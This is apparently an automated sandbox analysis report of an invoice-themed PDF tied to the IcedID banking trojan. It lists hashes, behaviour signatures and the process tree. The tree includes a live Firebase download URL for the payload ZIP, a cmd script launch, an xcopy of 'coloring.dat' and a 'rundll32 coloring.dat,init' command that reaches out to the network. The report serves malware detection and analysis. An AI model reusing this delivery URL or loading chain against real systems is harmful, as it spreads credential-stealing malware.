Resubmissions

13-01-2023 03:19

230113-dt7lnsdh57 3

12-01-2023 20:51

230112-zncd8see5z 10

Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    12-01-2023 20:51

General

  • Target

    Document_61_Unpaid_-1-12.pdf

  • Size

    108KB

  • MD5

    69fec563aa8bdfe9350f7c7534faec86

  • SHA1

    8a09a79aa30a497ca812111293f896ca88e8aa32

  • SHA256

    897941816861d957d6eacd2bcbb7b06fd48c9f73be02b72082a01a257c85f3f2

  • SHA512

    dde5428609730781e9a7e30e973af161e261863a1e1f99c657fac3ae393f472f018bbdf37d764ee66b1f03e4ba86995d23a91b622b71a8c76d73e15266dc9c5a

  • SSDEEP

    3072:x1F8+5dK2CVe3TlYaxd8DI07HkCqI+P5iX7El8:u6K2CUBYaxuDIuHkZoLEl8

Malware Config

Extracted

Family

icedid

Campaign

1387823457

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Document_61_Unpaid_-1-12.pdf"
    1⤵
    • Checks processor information in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D64B736B363FCDBF908F7C817DB90924 --mojo-platform-channel-handle=1616 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        3⤵
          PID:4680
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7D64F844B232074E56E7EF89B1666375 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7D64F844B232074E56E7EF89B1666375 --renderer-client-id=2 --mojo-platform-channel-handle=1652 --allow-no-sandbox-job /prefetch:1
          3⤵
            PID:1400
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D7176B077DA1892EED0362AC691292F6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D7176B077DA1892EED0362AC691292F6 --renderer-client-id=4 --mojo-platform-channel-handle=2052 --allow-no-sandbox-job /prefetch:1
            3⤵
              PID:2152
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DE7DAC918E8AD1365B87BBE3A1C37910 --mojo-platform-channel-handle=2484 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              3⤵
                PID:2724
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0F966323592BA05E970CDCB2368A67AF --mojo-platform-channel-handle=1636 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                3⤵
                  PID:4824
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8571E0610F9803EA471651532EFCAB32 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  3⤵
                    PID:4132
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                  2⤵
                    PID:5112
                  • C:\Windows\SysWOW64\LaunchWinApp.exe
                    "C:\Windows\system32\LaunchWinApp.exe" "https://firebasestorage.googleapis.com/v0/b/thermal-hour-371721.appspot.com/o/LO9ydkU1kV%2FDocument_139_Copy_01-12.zip?alt=media&token=27b30ebf-3f6b-4b7b-ad3c-5053b832c2c4"
                    2⤵
                      PID:3056
                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                    1⤵
                    • Drops file in Windows directory
                    • Modifies Internet Explorer settings
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:3192
                  • C:\Windows\system32\browser_broker.exe
                    C:\Windows\system32\browser_broker.exe -Embedding
                    1⤵
                    • Modifies Internet Explorer settings
                    • Modifies registry class
                    PID:1764
                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                    1⤵
                    • Modifies registry class
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:4604
                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                    1⤵
                    • Drops file in Windows directory
                    • Modifies Internet Explorer settings
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4168
                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                    1⤵
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5032
                  • C:\Windows\System32\rundll32.exe
                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                    1⤵
                      PID:2116
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
                      1⤵
                      • Checks SCSI registry key(s)
                      • Modifies data under HKEY_USERS
                      PID:4872
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c dunshevieo\canpeghasD.cmd A B C D E F G H I J K L M N O P n R S T U V W X Y Z 0 1 2 3 4 5 6 7 8 9
                      1⤵
                      • Enumerates connected drives
                      PID:4512
                      • C:\Windows\system32\xcopy.exe
                        xcopy /s /i /e /h dunshevieo\coloring.dat C:\Users\Admin\AppData\Local\Temp\*
                        2⤵
                          PID:4996
                        • C:\Windows\system32\rundll32.exe
                          rundll32 C:\Users\Admin\AppData\Local\Temp\coloring.dat,init
                          2⤵
                          • Blocklisted process makes network request
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4888

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\coloring.dat
                        Filesize

                        189KB

                        MD5

                        c9f3dd6dddcd3beb7070d9f915219034

                        SHA1

                        c3f080523dc1b8c444742f372b9d212743b8a503

                        SHA256

                        65281fe83e22bde20fa56079bebaea6fb353d1036be8073924fdf64cd9194984

                        SHA512

                        41c4bc71788b5c48cdce3337f281c886c38cef0d139bdaa7d90250418df7582663ccc298c04b8e52c0d5f4da1ecd34fb82dd424aacc67d8559bfdc2e2caf160b

                      • C:\Users\Admin\Downloads\Document_139_Copy_01-12.zip
                        Filesize

                        108KB

                        MD5

                        7196ceaabda9e68ed54f11ac39415e88

                        SHA1

                        6f9584e723deb74e01dfb29e7e67eaeb6baf4383

                        SHA256

                        4fd529907ee789daef422620b3894b81a539f937f804c3fdcfe4048782975eac

                        SHA512

                        fd6c8fe5a3b31cd86fce38f83cfd0e051b27bf666f6d27e9a263749ca7363973908b4768cfcdb679028816e30c96366fb832890328ee9d19c440cb17b9273bbb

                      • \Users\Admin\AppData\Local\Temp\coloring.dat
                        Filesize

                        189KB

                        MD5

                        c9f3dd6dddcd3beb7070d9f915219034

                        SHA1

                        c3f080523dc1b8c444742f372b9d212743b8a503

                        SHA256

                        65281fe83e22bde20fa56079bebaea6fb353d1036be8073924fdf64cd9194984

                        SHA512

                        41c4bc71788b5c48cdce3337f281c886c38cef0d139bdaa7d90250418df7582663ccc298c04b8e52c0d5f4da1ecd34fb82dd424aacc67d8559bfdc2e2caf160b

                      • memory/1396-207-0x0000000000000000-mapping.dmp
                      • memory/1400-417-0x0000000000000000-mapping.dmp
                      • memory/2152-449-0x0000000000000000-mapping.dmp
                      • memory/2208-155-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-128-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-125-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-126-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-157-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-158-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-129-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-130-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-131-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-132-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-133-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-134-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-135-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-136-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-137-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-138-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-139-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-140-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-141-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-142-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-143-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-144-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-145-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-146-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-147-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-148-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-149-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-150-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-151-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-152-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-153-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-154-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-123-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-156-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-159-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-124-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-127-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-160-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-161-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-162-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-163-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-164-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-165-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-166-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-167-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-168-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-169-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-170-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-171-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-172-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-173-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-174-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-175-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-176-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-177-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-179-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-178-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-180-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-181-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-182-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-183-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-120-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-121-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2208-122-0x0000000077540000-0x00000000776CE000-memory.dmp
                        Filesize

                        1.6MB

                      • memory/2724-757-0x0000000000000000-mapping.dmp
                      • memory/3056-316-0x0000000000000000-mapping.dmp
                      • memory/4132-964-0x0000000000000000-mapping.dmp
                      • memory/4680-375-0x0000000000000000-mapping.dmp
                      • memory/4824-872-0x0000000000000000-mapping.dmp
                      • memory/4888-1058-0x0000000000000000-mapping.dmp
                      • memory/4996-1057-0x0000000000000000-mapping.dmp
                      • memory/5112-306-0x0000000000000000-mapping.dmp